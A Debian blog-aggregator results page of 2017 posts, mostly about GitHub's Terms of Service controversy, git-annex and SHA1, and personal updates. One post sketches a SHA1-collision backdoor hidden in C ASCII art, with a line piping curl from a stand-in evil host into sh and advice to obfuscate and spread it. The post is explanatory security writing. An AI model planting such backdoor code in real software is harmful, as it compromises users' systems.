Search Results: "joey"

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird! Satellite internet dish with solar panels in foreground While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of only dialup at home ongoing became more painful. While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now. 9.1 dB SNR speedtest results: 15 megabit down / 4.5 up with significant variation Dish seems well aligned, speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day. Satellite dish

8 March 2017

Antoine Beaupr : An update to GitHub's terms of service

On February 28th, GitHub published a brand new version of its Terms of Service (ToS). While the first draft announced earlier in February didn't generate much reaction, the new ToS raised concerns that they may break at least the spirit, if not the letter, of certain free-software licenses. Digging in further reveals that the situation is probably not as dire as some had feared. The first person to raise the alarm was probably Thorsten Glaser, a Debian developer, who stated that the "new GitHub Terms of Service require removing many Open Source works from it". His concerns are mainly about section D of the document, in particular section D.4 which states:
You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
Section D.5 then goes on to say:
[...] You grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality

ToS versus GPL The concern here is that the ToS bypass the normal provisions of licenses like the GPL. Indeed, copyleft licenses are based on copyright law which forbid users from doing anything with the content unless they comply with the license, which forces, among other things, "share alike" properties. By granting GitHub and its users rights to reproduce content without explicitly respecting the original license, the ToS may allow users to bypass the copyleft nature of the license. Indeed, as Joey Hess, author of git-annex, explained :
The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license
Hess has since removed all his content (mostly mirrors) from GitHub. Others disagree. In a well-reasoned blog post, Debian developer Jonathan McDowell explained the rationale behind the changes:
My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service.
This seems like a fair point to make: GitHub needs to protect its own rights to operate the service. McDowell then goes on to do a detailed rebuttal of the arguments made by Glaser, arguing specifically that section D.5 "does not grant [...] additional rights to reproduce outside of GitHub". However, specific problems arise when we consider that GitHub is a private corporation that users have no control over. The "Services" defined in the ToS explicitly "refers to the applications, software, products, and services provided by GitHub". The term "Services" is therefore not limited to the current set of services. This loophole may actually give GitHub the right to bypass certain provisions of licenses used on GitHub. As Hess detailed in a later blog post:
If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
However, when asked on IRC, Bradley M. Kuhn of the Software Freedom Conservancy explained that "ultimately, failure to comply with a copyleft license is a copyright infringement" and that the ToS do outline a process to deal with such infringement. Some lawyers have also publicly expressed their disagreement with Glaser's assessment, with Richard Fontana from Red Hat saying that the analysis is "basically wrong". It all comes down to the intent of the ToS, as Kuhn (who is not a lawyer) explained:
any license can be abused or misused for an intent other than its original intent. It's why it matters to get every little detail right, and I hope Github will do that.
He went even further and said that "we should assume the ambiguity in their ToS as it stands is favorable to Free Software". The ToS are in effect since February 28th; users "can accept them by clicking the broadcast announcement on your dashboard or by continuing to use GitHub". The immediacy of the change is one of the reasons why certain people are rushing to remove content from GitHub: there are concerns that continuing to use the service may be interpreted as consent to bypass those licenses. Hess even hosted a separate copy of the ToS [PDF] for people to be able to read the document without implicitly consenting. It is, however, unclear how a user should remove their content from the GitHub servers without actually agreeing to the new ToS.

CLAs When I read the first draft, I initially thought there would be concerns about the mandatory Contributor License Agreement (CLA) in section D.5 of the draft:
[...] unless there is a Contributor License Agreement to the contrary, whenever you make a contribution to a repository containing notice of a license, you license your contribution under the same terms, and agree that you have the right to license your contribution under those terms.
I was concerned this would establish the controversial practice of forcing CLAs on every GitHub user. I managed to find a post from a lawyer, Kyle E. Mitchell, who commented on the draft and, specifically, on the CLA. He outlined issues with wording and definition problems in that section of the draft. In particular, he noted that "contributor license agreement is not a legal term of art, but an industry term" and "is a bit fuzzy". This was clarified in the final draft, in section D.6, by removing the use of the CLA term and by explicitly mentioning the widely accepted norm for licenses: "inbound=outbound". So it seems that section D.6 is not really a problem: contributors do not need to necessarily delegate copyright ownership (as some CLAs require) when they make a contribution, unless otherwise noted by a repository-specific CLA. An interesting concern he raised, however, was with how GitHub conducted the drafting process. A blog post announced the change on February 7th with a link to a form to provide feedback until the 21st, with a publishing deadline of February 28th. This gave little time for lawyers and developers to review the document and comment on it. Users then had to basically accept whatever came out of the process as-is. Unlike every software project hosted on GitHub, the ToS document is not part of a Git repository people can propose changes to or even collaboratively discuss. While Mitchell acknowledges that "GitHub are within their rights to update their terms, within very broad limits, more or less however they like, whenever they like", he sets higher standards for GitHub than for other corporations, considering the community it serves and the spirit it represents. He described the process as:
[...] consistent with the value of CYA, which is real, but not with the output-improving virtues of open process, which is also real, and a great deal more pleasant.
Mitchell also explained that, because of its position, GitHub can have a major impact on the free-software world.
And as the current forum of preference for a great many developers, the knock-on effects of their decisions throw big weight. While GitHub have the wheel and they ve certainly earned it for now they can do real damage.
In particular, there have been some concerns that the ToS change may be an attempt to further the already diminishing adoption of the GPL for free-software projects; on GitHub, the GPL has been surpassed by the MIT license. But Kuhn believes that attitudes at GitHub have begun changing:
GitHub historically had an anti-copyleft culture, which was created in large part by their former and now ousted CEO, Preston-Warner. However, recently, I've seen people at GitHub truly reach out to me and others in the copyleft community to learn more and open their minds. I thus have a hard time believing that there was some anti-copyleft conspiracy in this ToS change.

GitHub response However, it seems that GitHub has actually been proactive in reaching out to the free software community. Kuhn noted that GitHub contacted the Conservancy to get its advice on the ToS changes. While he still thinks GitHub should fix the ambiguities quickly, he also noted that those issues "impact pretty much any non-trivial Open Source and Free Software license", not just copylefted material. When reached for comments, a GitHub spokesperson said:
While we are confident that these Terms serve the best needs of the community, we take our users' feedback very seriously and we are looking closely at ways to address their concerns.
Regardless, free-software enthusiasts have other concerns than the new ToS if they wish to use GitHub. First and foremost, most of the software running GitHub is proprietary, including the JavaScript served to your web browser. GitHub also created a centralized service out of a decentralized tool (Git). It has become the largest code hosting service in the world after only a few years and may well have become a single point of failure for free software collaboration in a way we have never seen before. Outages and policy changes at GitHub can have a major impact on not only the free-software world, but also the larger computing world that relies on its services for daily operation. There are now free-software alternatives to GitHub. GitLab.com, for example, does not seem to have similar licensing issues in its ToS and GitLab itself is free software, although based on the controversial open core business model. The GitLab hosting service still needs to get better than its grade of "C" in the GNU Ethical Repository Criteria Evaluations (and it is being worked on); other services like GitHub and SourceForge score an "F". In the end, all this controversy might have been avoided if GitHub was generally more open about the ToS development process and gave more time for feedback and reviews by the community. Terms of service are notorious for being confusing and something of a legal gray area, especially for end users who generally click through without reading them. We should probably applaud the efforts made by GitHub to make its own ToS document more readable and hope that, with time, it will address the community's concerns.
Note: this article first appeared in the Linux Weekly News.

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licenced under two different licences? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone say, does some brief contracting with Github, that they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was loaded a webpage in a browser and saw on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, that Github's laywers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modified my software, does not distribute the modified version, but converts it to javascipt code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
5 License Grant to Other Users Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they no longer are allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of a platform-specific term "fork" be interpreted in this license if it was being analized in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocious. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

Jonathan McDowell: Rational thoughts on the GitHub ToS change

I woke this morning to Thorsten claiming the new GitHub Terms of Service could require the removal of Free software projects from it. This was followed by joeyh removing everything from github. I hadn t actually been paying attention, so I went looking for some sort of summary of whether I should be worried and ended up reading the actual ToS instead. TL;DR version: No, I m not worried and I don t think you should be either. First, a disclaimer. I m not a lawyer. I have some legal training, but none of what I m about to say is legal advice. If you re really worried about the changes then you should engage the services of a professional. The gist of the concerns around GitHub s changes are that they potentially circumvent any license you have applied to your code, either converting GPL licensed software to BSD style (and thus permitting redistribution of binary forms without source) or making it illegal to host software under certain Free software licenses on GitHub due to being unable to meet the requirements of those licenses as a result of GitHub s ToS. My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service. There are sadly too many people who upload code there without a license, meaning that technically no one can do anything with it. Don t do this people; make sure that any project you put on GitHub has some sort of license attached to it (don t write your own - it s highly likely one of Apache/BSD/GPL will suit your needs) so people know whether they can make use of it or not. I don t care is not a valid reason not to do this. Section D, relating to user generated content, is the one causing the problems. It s possibly easiest to walk through each subsection in order. D1 says GitHub don t take any responsibility for your content; you make it, you re responsible for it, they re not accepting any blame for harm your content does nor for anything any member of the public might do with content you ve put on GitHub. This seems uncontentious. D2 reaffirms your ownership of any content you create, and requires you to only post 3rd party content to GitHub that you have appropriate rights to. So I can t, for example, upload a copy of Friday by Rebecca Black. Thorsten has some problems with D3, where GitHub reserve the right to remove content that violates their terms or policies. He argues this could cause issues with licenses that require unmodified source code. This seems to be alarmist, and also applies to any random software mirror. The intent of such licenses is in general to ensure that the pristine source code is clearly separate from 3rd party modifications. Removal of content that infringes GitHub s T&Cs is not going to cause an issue. D4 is a license grant to GitHub, and I think forms part of joeyh s problems with the changes. It affirms the content belongs to the user, but grants rights to GitHub to store and display the content, as well as make copies such as necessary to provide the GitHub service. They explicitly state that no right is granted to sell the content at all or to distribute the content outside of providing the GitHub service. This term would seem to be the minimum necessary for GitHub to ensure they are allowed to provide code uploaded to them for download, and provide their web interface. If you ve actually put a Free license on your code then this isn t necessary, but from GitHub s point of view I can understand wanting to make it explicit that they need these rights to be granted. I don t believe it provides a method of subverting the licensing intent of Free software authors. D5 provides more concern to Thorsten. It seems he believes that the ability to fork code on GitHub provides a mechanism to circumvent copyleft licenses. I don t agree. The second paragraph of this subsection limits the license granted to the user to be the ability to reproduce the content on GitHub - it does not grant them additional rights to reproduce outside of GitHub. These rights, to my eye, enable the forking and viewing of content within GitHub but say nothing about my rights to check code out and ignore the author s upstream license. D6 clarifies that if you submit content to a GitHub repo that features a license you are licensing your contribution under these terms, assuming you have no other agreement in place. This looks to be something that benefits projects on GitHub receiving contributions from users there; it s an explicit statement that such contributions are under the project license. D7 confirms the retention of moral rights by the content owner, but states they are waived purely for the purposes of enabling GitHub to provide service, as stated under D4. In particular this right is revocable so in the event they do something you don t like you can instantly remove all of their rights. Thorsten is more worried about the ability to remove attribution and thus breach CC-BY or some BSD licenses, but GitHub s whole model is providing attribution for changesets and tracking such changes over time, so it s hard to understand exactly where the service falls down on ensuring the provenance of content is clear. There are reasons to be wary of GitHub (they ve taken a decentralised revision control system and made a business model around being a centralised implementation of it, and they store additional metadata such as PRs that aren t as easily extracted), but I don t see any indication that the most recent changes to their Terms of Service are something to worry about. The intent is clearly to provide GitHub with the legal basis they need to provide their service, rather than to provide a means for them to subvert the license intent of any Free software uploaded.

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and went negative now. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

Thorsten Glaser: New GitHub Terms of Service r e q u i r e removing many Open Source works from it

Please use the correct (perma)link to bookmark this article, not the page listing all wlog entries of the last decade. Thank you.</update> Some updates inline and at the bottom. The new Terms of Service of GitHub became effective today, which is quite problematic there was a review phase, but my reviews pointing out the problems were not answered, and, while the language is somewhat changed from the draft, they became effective immediately. Now, the new ToS are not so bad that one immediately must stop using their service for disagreement, but it s important that certain content may no longer legally be pushed to GitHub. I ll try to explain which is affected, and why. I m mostly working my way backwards through section D, as that s where the problems I identified lie, and because this is from easier to harder. Note that using a private repository does not help, as the same terms apply. Anything requiring attribution (e.g. CC-BY, but also BSD, ) Section D.7 requires the person uploading content to waive any and all attribution rights. Ostensibly to allow basic functions like search to work , which I can even believe, but, for a work the uploader did not create completely by themselves, they can t grant this licence. The CC licences are notably bad because they don t permit sublicencing, but even so, anything requiring attribution can, in almost all cases, not written or otherwise, created or uploaded by our Users . This is fact, and the exceptions are few. Anything putting conditions on the right to use, display and perform the work and, worse, reproduce (all Copyleft) Section D.5 requires the uploader to grant all other GitHub users Note that section D.4 is similar, but granting the licence to GitHub (and their successors); while this is worded much more friendly than in the draft, this fact only makes it harder to see if it affects works in a similar way. But that doesn t matter since D.5 is clear enough. (This doesn t mean it s not a problem, just that I don t want to go there and analyse D.4 as D.5 points out the same problems but is easier.) This means that any and all content under copyleft licences is also no longer welcome on GitHub. Anything requiring integrity of the author s source (e.g. LPPL) Some licences are famous for requiring people to keep the original intact while permitting patches to be piled on top; this is actually permissible for Open Source, even though annoying, and the most common LaTeX licence is rather close to that. Section D.3 says any (partial) content can be removed though keeping a PKZIP archive of the original is a likely workaround. Affected licences Anything copyleft (GPL, AGPL, LGPL, CC-*-SA) or requiring attribution (CC-BY-*, but also 4-clause BSD, Apache 2 with NOTICE text file, ) are affected. BSD-style licences without advertising clause (MIT/Expat, MirOS, etc.) are probably not affected if GitHub doesn t go too far and dissociates excerpts from their context and legal info, but then nobody would be able to distribute it, so that d be useless. But what if I just fork something under such a licence? Only continuing to use GitHub constitutes accepting the new terms. This means that repositories from people who last used GitHub before March 2017 are excluded. Even then, the new terms likely only apply to content uploaded in March 2017 or later (note that git commit dates are unreliable, you have to actually check whether the contribution dates March 2017 or later). And then, most people are likely unaware of the new terms. If they upload content they themselves don t have the appropriate rights (waivers to attribution and copyleft/share-alike clauses), it s plain illegal and also makes your upload of them or a derivate thereof no more legal. Granted, people who, in full knowledge of the new ToS, share any User-Generated Content with GitHub on or after 1 March, 2017, and actually have the appropriate rights to do that, can do that; and if you encounter such a repository, you can fork, modify and upload that iff you also waive attribution and copyleft/share-alike rights for your portion of the upload. But especially in the beginning these will be few and far between (even more so taking into account that GitHub is, legally spoken, a mess, and they don t even care about hosting only OSS / Free works). Conclusion (Fazit) I ll be starting to remove any such content of mine, such as the source code mirrors of jupp, which is under the GNU GPLv1, now and will be requesting people who forked such repositories on GitHub to also remove them. This is not something I like to do but something I am required to do in order to comply with the licence granted to me by my upstream. Anything you ve found contributed by me in the meantime is up for review; ping me if I forgot something. (mksh is likely safe, even if I hereby remind you that the attribution requirement of the BSD-style licences still applies outside of GitHub.) (Pet peeve: why can t I adopt a licence with British spelling? They seem to require oversea barbarian spelling.) The others Atlassian Bitbucket has similar terms (even worse actually; I looked at them to see whether I could mirror mksh there, and turns out, I can t if I don t want to lose most of what few rights I retain when publishing under a permissive licence). Gitlab seems to not have such, but requires you to indemnify them YMMV. I think I ll self-host the removed content. And now? I m in contact with someone from GitHub Legal (not explicitly in the official capacity though) and will try to explain the sheer magnitude of the problem and ways to solve this (leaving the technical issues to technical solutions and requiring legal solutions only where strictly necessary), but for now, the ToS are enacted (another point of my criticism of this move) and thus, the aforementioned works must go off GitHub right now. That s not to say they may not come back later once this all has been addressed, if it will be addressed to allow that. The new ToS do have some good; for example, the old ToS said you allow every GitHub user to fork your repositories without ever specifying what that means. It s just that the people over at GitHub need to understand that, both legally and technically , any and all OSS licences grant enough to run a hosting platform already , and separate explicit grants are only needed if a repository contains content not under an OSI/OKFN/Copyfree/FSF/DFSG-free licence. I have been told that these are important issues and been thanked for my feedback; we ll see what comes from this. maybe with a little more effort on the coders side All licences on one of those lists or conformant to the DFSG, OSD or OKD should do . e.g. when displaying search results, add a note this is an excerpt, click HERE to get to the original work in its context, with licence and attribution where HERE is a backlink to the file in the repository It is understood those organisations never un-approve any licence that rightfully conforms to those definitions (also in cases like a grant saying just use any OSS licence which is occasionally used) Update: In the meantime, joeyh has written not one but two insightful articles (although I disagree in some details; the new licence is only to GitHub users (D.5) and GitHub (D.4) and only within their system, so, while uploaders would violate the ToS (they cannot grant the licence) and (probably) the upstream-granted copyleft licence, this would not mean that everyone else wasn t bound by the copyleft licence in, well, enough cases to count (yes it s possible to construct situations in which this hurts the copyleft fraction, but no, they re nowhere near 100%).

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");
 
Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh late summer the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

8 February 2017

Manuel A. Fernandez Montecelo: FOSDEM 2017: People, RISC-V and ChaosKey

This year, for the first time, I attended FOSDEM. There I met... People ... including: I met new people in: ... from the first hour to the last hour of my stay in Brussels. In summary, lots of people around. I also hoped to meet or spend some (more) time with a few people, but in the end I didn't catch them, our could not spend as much time with them as I would wish. For somebody like me who enjoys quiet time by itsef, it was a bit too intensive in terms of interacting with people. But overall it was a nice winter break, definitely worth to attend, and even a much better experience than what I had expected. Talks / Events Of course, I also attended a few talks, some of which were very interesting; although the event is so (sometimes uncomfortably) crowded that the rooms were full more often than not, in which case it was not possible to enter (the doors were closed) or there were very long queues for waiting. And with so many talks crammed into a weekend, I had so many schedule clashes with the talks that I had pre-selected as interesting, that I ended up missing most of them. In terms of technical stuff, I have specially enjoyed the talk by Arun Thomas RISC-V -- Open Hardware for Your Open Source Software, and some conversations related with toolchain stuff and other upstream stuff, as well as on the Debian port for RISC-V. The talk Resurrecting dinosaurs, what can possibly go wrong? -- How Containerised Applications could eat our users, by Richard Brown, was also very good. ChaosKey Apart from that, I have witnessed a shady cash transaction in a bus from the city centre to FOSDEM in exchange for hardware, not very unlike what I had read about only days before. So I could not help but to get involved in a subsequent transaction myself, to get my hands laid upon a ChaosKey.

26 January 2017

Joey Hess: badUSB

3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since This actually happened.
Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.
In real life, my hat is uglier, and Keithp is more kindly looking. gimp source

9 January 2017

Sean Whitton: jan17vcspkg

There have been a two long threads on the debian-devel mailing list about the representation of the changes to upstream source code made by Debian maintainers. Here are a few notes for my own reference. I spent a lot of time defending the workflow I described in dgit-maint-merge(7) (which was inspired by this blog post). However, I came to be convinced that there is a case for a manually curated series of patches for certain classes of package. It will depend on how upstream uses git (rebasing or merging) and on whether the Debian delta from upstream is significant and/or long-standing. I still think that we should be using dgit-maint-merge(7) for leaf or near-leaf packages, because it saves so much volunteer time that can be better spent on other things. When upstream does use a merging workflow, one advantage of the dgit-maint-merge(7) workflow is that Debian s packaging is just another branch of development. Now consider packages where we do want a manually curated patch series. It is very hard to represent such a series in git. The only natural way to do it is to continually rebase the patch series against an upstream branch, but public branches that get rebased are not a good idea. The solution that many people have adopted is to represent their patch series as a folder full of .diff files, and then use gbp pq to convert this into a rebasing branch. This branch is not shared. It is edited, rebased, and then converted back to the folder of .diff files, the changes to which are then committed to git. One of the advantages of dgit is that there now exists an official, non-rebasing git history of uploads to the archive. It would be nice if we could represent curated patch series as branches in the dgit repos, rather than as folders full of .diff 